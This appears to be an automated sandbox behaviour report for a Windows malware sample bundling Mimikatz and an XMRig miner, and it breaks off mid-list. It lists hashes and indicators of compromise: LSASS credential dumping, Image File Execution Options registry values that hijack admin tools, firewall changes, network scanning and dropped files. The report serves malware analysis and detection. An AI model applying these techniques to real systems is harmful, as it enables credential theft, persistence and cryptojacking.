Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 08:35
Behavioral task
behavioral1
Sample
2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe
-
Size
9.4MB
-
MD5
55c66a979c113f2725cd67113c831f70
-
SHA1
ed41ba98c92e88635f56acc6569d074484684349
-
SHA256
536baaf40f122b68f3dd9330f8bc9ead9f2532ef52602944bb4f1d5baedd0729
-
SHA512
a259cba1cd0be1247e81f0f7bac74961502883a0454ddfc78b91642b2217b2a5e3944fde48c5406b733363ed4b0ba90711bb3c7dc8b40e56b24824045fbba665
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
gyksekf.exedescription pid Process procid_target PID 3136 created 1628 3136 gyksekf.exe 37 -
Contacts a large (20441) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/5016-176-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-180-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-197-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-215-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-224-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-233-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-249-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-256-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-265-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig behavioral2/memory/5016-372-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4944-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4944-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00070000000234c4-6.dat mimikatz behavioral2/memory/2336-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3584-137-0x00007FF7EE6C0000-0x00007FF7EE7AE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
gyksekf.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts gyksekf.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts gyksekf.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
gyksekf.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" gyksekf.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 3560 netsh.exe 2096 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
gyksekf.exegyksekf.exewpcap.exebcnqaufec.exevfshost.exexohudmc.exetyxtue.exeeyclekfbe.exerslzfe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exegyksekf.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeypseczenn.exegyksekf.exepid Process 2336 gyksekf.exe 3136 gyksekf.exe 460 wpcap.exe 3324 bcnqaufec.exe 3584 vfshost.exe 1968 xohudmc.exe 2144 tyxtue.exe 2244 eyclekfbe.exe 5016 rslzfe.exe 1656 eyclekfbe.exe 2304 eyclekfbe.exe 4424 eyclekfbe.exe 4680 eyclekfbe.exe 740 eyclekfbe.exe 3732 eyclekfbe.exe 3420 eyclekfbe.exe 212 eyclekfbe.exe 3316 eyclekfbe.exe 1872 gyksekf.exe 1548 eyclekfbe.exe 4752 eyclekfbe.exe 4784 eyclekfbe.exe 3236 eyclekfbe.exe 5048 eyclekfbe.exe 464 eyclekfbe.exe 4460 eyclekfbe.exe 3816 eyclekfbe.exe 3952 ypseczenn.exe 5464 gyksekf.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebcnqaufec.exepid Process 460 wpcap.exe 460 wpcap.exe 460 wpcap.exe 460 wpcap.exe 460 wpcap.exe 460 wpcap.exe 460 wpcap.exe 460 wpcap.exe 460 wpcap.exe 3324 bcnqaufec.exe 3324 bcnqaufec.exe 3324 bcnqaufec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 75 ifconfig.me 76 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exexohudmc.exegyksekf.exedescription ioc Process File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\tyxtue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF gyksekf.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft gyksekf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 gyksekf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF gyksekf.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 gyksekf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE gyksekf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache gyksekf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData gyksekf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 gyksekf.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\tyxtue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies gyksekf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content gyksekf.exe -
Processes:
resource yara_rule behavioral2/memory/3584-135-0x00007FF7EE6C0000-0x00007FF7EE7AE000-memory.dmp upx behavioral2/files/0x0007000000023519-136.dat upx behavioral2/files/0x0007000000023524-156.dat upx behavioral2/memory/2244-155-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/2244-159-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/3584-137-0x00007FF7EE6C0000-0x00007FF7EE7AE000-memory.dmp upx behavioral2/files/0x0007000000023521-162.dat upx behavioral2/memory/5016-163-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/1656-169-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/2304-173-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5016-176-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/4424-178-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5016-180-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/4680-183-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/740-187-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/3732-191-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/3420-195-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5016-197-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/212-200-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/3316-209-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/1548-213-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5016-215-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/4752-218-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/4784-222-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5016-224-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/3236-227-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5048-230-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/464-232-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5016-233-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/4460-235-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/3816-237-0x00007FF671F70000-0x00007FF671FCB000-memory.dmp upx behavioral2/memory/5016-249-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/5016-256-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/5016-265-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx behavioral2/memory/5016-372-0x00007FF665CF0000-0x00007FF665E10000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
gyksekf.exe2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.execmd.exeypseczenn.exedescription ioc Process File created C:\Windows\imzygjkjt\UnattendGC\specials\exma-1.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\spoolsrv.xml gyksekf.exe File opened for modification C:\Windows\nlinnsgc\gyksekf.exe 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\schoedcl.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\docmicfg.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\libeay32.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\ssleay32.dll gyksekf.exe File opened for modification C:\Windows\imzygjkjt\lezcicjbi\Packet.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\spoolsrv.exe gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\coli-0.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\crli-0.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\spoolsrv.xml gyksekf.exe File created C:\Windows\nlinnsgc\svschost.xml gyksekf.exe File created C:\Windows\nlinnsgc\spoolsrv.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\Shellcode.ini gyksekf.exe File created C:\Windows\imzygjkjt\lezcicjbi\bcnqaufec.exe gyksekf.exe File created C:\Windows\imzygjkjt\lezcicjbi\Packet.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\trch-1.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\tucl-1.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\xdvl-0.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\svschost.exe gyksekf.exe File created C:\Windows\imzygjkjt\lezcicjbi\wpcap.exe gyksekf.exe File created C:\Windows\imzygjkjt\Corporate\mimidrv.sys gyksekf.exe File created C:\Windows\imzygjkjt\Corporate\mimilib.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\posh-0.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\schoedcl.exe gyksekf.exe File opened for modification C:\Windows\nlinnsgc\svschost.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\zlib1.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\ucl.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\svschost.xml gyksekf.exe File created C:\Windows\nlinnsgc\docmicfg.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\AppCapture64.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\cnli-1.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\svschost.xml gyksekf.exe File created C:\Windows\imzygjkjt\upbdrjv\swrpwe.exe gyksekf.exe File created C:\Windows\imzygjkjt\lezcicjbi\scan.bat gyksekf.exe File created C:\Windows\imzygjkjt\lezcicjbi\ypseczenn.exe gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\trfo-2.dll gyksekf.exe File opened for modification C:\Windows\nlinnsgc\vimpcsvc.xml gyksekf.exe File opened for modification C:\Windows\nlinnsgc\docmicfg.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\tibe-2.dll gyksekf.exe File created C:\Windows\imzygjkjt\Corporate\vfshost.exe gyksekf.exe File created C:\Windows\imzygjkjt\lezcicjbi\ip.txt gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\vimpcsvc.exe gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\libxml2.dll gyksekf.exe File created C:\Windows\imzygjkjt\lezcicjbi\wpcap.dll gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\vimpcsvc.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\schoedcl.xml gyksekf.exe File created C:\Windows\nlinnsgc\vimpcsvc.xml gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\AppCapture32.dll gyksekf.exe File opened for modification C:\Windows\imzygjkjt\Corporate\log.txt cmd.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\docmicfg.exe gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\docmicfg.xml gyksekf.exe File created C:\Windows\nlinnsgc\schoedcl.xml gyksekf.exe File opened for modification C:\Windows\nlinnsgc\spoolsrv.xml gyksekf.exe File opened for modification C:\Windows\nlinnsgc\schoedcl.xml gyksekf.exe File created C:\Windows\ime\gyksekf.exe gyksekf.exe File created C:\Windows\imzygjkjt\UnattendGC\specials\vimpcsvc.xml gyksekf.exe File opened for modification C:\Windows\imzygjkjt\lezcicjbi\Result.txt ypseczenn.exe File created C:\Windows\nlinnsgc\gyksekf.exe 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 1336 sc.exe 2824 sc.exe 4684 sc.exe 2224 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
gyksekf.exenetsh.execmd.execmd.exenet.exetyxtue.execmd.execmd.exeschtasks.exenetsh.exesc.exenet1.exenetsh.execmd.exenet.execmd.execmd.execmd.exenet.exenetsh.exesc.execacls.exewpcap.exenet.exenet.execmd.exenetsh.exe2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.execmd.exenetsh.exenet.exebcnqaufec.execmd.exenetsh.exenetsh.execmd.execmd.execmd.exenetsh.exexohudmc.exeypseczenn.exePING.EXEnet.exenetsh.exenetsh.execmd.exesc.exesc.exegyksekf.execmd.execacls.exenet1.execmd.execmd.exenet1.execmd.execmd.exenet.execmd.exenetsh.execmd.exenetsh.execmd.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gyksekf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 